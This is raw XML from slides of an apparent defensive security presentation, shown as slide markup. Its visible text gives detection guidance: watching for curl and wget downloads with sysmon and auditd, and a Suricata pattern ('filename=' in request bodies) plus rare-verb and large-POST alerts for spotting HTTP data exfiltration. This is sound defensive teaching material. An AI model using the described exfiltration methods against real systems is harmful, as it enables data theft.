                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB9DB80-25B7-EBF9-BD39-A40B706977C2}"/>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0" name="AutoShape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477A79EC-16C0-53FB-9405-D765976BFFD7}"/>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21" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B89B67E2-94C8-29A8-E9E4-0BC4475FD2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10705775" y="8736397"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="AutoShape 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D292CAC-CB29-ACDE-6627-13CA375276F8}"/>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3" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168F0BD7-CD0C-12FD-C72A-9651F3E03EC8}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61616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a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E47BAAC-4DE4-9386-D16D-87E07AFAC9FD}"/>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D4B37450-13A7-06C8-6387-99D0BD089C47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10775967" y="1759241"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C81542-79FC-1A31-841C-2E3920F3C9F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2C553F-275B-E958-1D8E-5BE75C27FDE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10911840" y="1557535"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6A4161-BF28-2583-CC0B-9728147C174E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="-11942" r="-11942"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2F6E62-EDF4-8A7A-D4E4-DAE35009000B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="409735"/>
            <a:ext cx="8853088" cy="771365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Suspicious File Downloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BEF2C1F-B9E7-D64E-36F3-2D9DE9A9CFED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3597176"/>
            <a:ext cx="8679875" cy="3662541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> Use sysmon and auditd to examine host usage of common download commands – wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> and curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> Combine with suricata to look in response headers of network traffic for attachments with executable and common archive extensions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3519825-3D49-CBA1-9F3A-4AF29E8FE1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B62484E5-7480-13FB-28FE-A7465E1A6DF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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13/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{859E7BBE-2C77-8C2E-B7FC-2D3C24AFBC75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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16" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A4D99D-B030-5081-31C3-DBEC955CF444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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AC1DC576-EF07-86AD-88E7-1197078439CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2209800" y="5143500"/>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8" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F0BA5B-522F-836F-DC6B-C412F054C4A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="889502" y="622802"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158CC020-3B62-0EF8-D680-30185B16F8B7}"/>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0" name="AutoShape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424454FC-A34A-1C65-1BC4-073B68756B1D}"/>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21" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{820EE7F3-4978-A32B-F1C8-231BDCA3483C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10705775" y="8736397"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="AutoShape 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E3F8BE-AF6D-DD87-6686-9F45A639DD4A}"/>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3" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44AE30C0-046B-6647-160B-7C5F3750F1C8}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2385685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a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B150923-8F88-6EDF-6069-4BBA59D35AD3}"/>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F22D54A0-6805-538F-F70F-4FD948E76BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10775967" y="1759241"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31A913B1-642C-D96C-567B-0F6AFF1B3130}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65F21C48-7767-A4FA-7DC1-DDD911F3D573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10911840" y="1557535"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F86B146-491F-D648-616F-8B5BA1E4012A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="-11942" r="-11942"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74374439-A851-69BE-3B8D-1661A874EA83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="257335"/>
            <a:ext cx="6948086" cy="771365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Exfil via http</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388CD185-4D3C-17E8-8805-DF853B70FD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2095500"/>
            <a:ext cx="8679875" cy="7417415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> Uncommon HTTP verbs (e.g., PUT, PATCH, WebDAV) — captured at process execution time so you can read the command line and alert when a rare verb is used..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> Large POSTs / uploads — captured at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> level by watching socket send syscalls from curl/wget where the payload length exceeds a threshold.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Suricata to additionally look for uncommon verbs and large posts also use http.request_body; content:"filename=" positively identifies multipart file uploads (common for exfil to web services).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F0F6FC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5660092D-6574-0B40-C73E-685E7B5431A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E37CC3D-2921-C482-D26E-81498703877B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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13/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{955794F9-BB0A-891F-0A00-9AD89BB8C893}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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16" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99DCCE8C-7B0E-CF24-1D6A-203033EDDEED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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E2FA6792-9CB0-C1E3-F1E7-E5EF745CE109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2209800" y="5143500"/>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8" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1849D8-BBDC-83DE-6709-0055C744A98F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1575302" y="470402"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9355D34F-FBE4-C9DB-28B8-F0520971B0D3}"/>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0" name="AutoShape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{728BDB52-63E5-5FA8-7965-5D3657C6CB6A}"/>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21" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B1B8FE-CB7D-0991-6F57-CC29A743B4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10705775" y="8736397"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="AutoShape 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEF3180A-29C0-463F-85E4-D8956CC6CA3B}"/>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3" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A5C884-27F1-BB55-71DE-19516D20A368}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4178645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3"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="24384000" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
